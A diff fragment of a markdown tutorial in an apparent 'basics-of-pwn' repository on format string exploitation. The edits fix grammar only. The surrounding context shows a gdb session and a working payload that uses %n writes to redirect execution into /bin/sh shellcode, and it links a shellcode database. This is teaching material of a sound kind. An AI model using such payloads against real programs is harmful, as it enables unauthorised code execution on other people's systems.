whatsyourask/basics-of-pwn/content/format-string/format-string.md

 gef➤
 ```

 You can see that the shellcode address was written.
-BUT, for me it doesn't work.
+BUT, for me, it doesn't work.
 So, now, I'm trying to solve the problem: the program jumps to shellcode but doesn't execute it properly...

 Okay, I solved it.
 The problem was in shellcode.
 It stops working :) So, I just took [another one](http://shell-storm.org/shellcode/files/shellcode-585.php "http://shell-storm.org/shellcode/files/shellcode-585.php") from the [shellcode database](http://shell-storm.org/shellcode/ "http://shell-storm.org/shellcode/").

-Here, you need to do the same calculations that was above, but the shellcode will be after format string things.
+Here, you need to do the same calculations that were above, but the shellcode will be after format string things.

 ```bash
 gef➤  r $(python -c 'print "\xac\xcf\xff\xff" + "\xae\xcf\xff\xff" + "%52958u" + "%6$n" + "%12569u" + "%7$n" + "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"')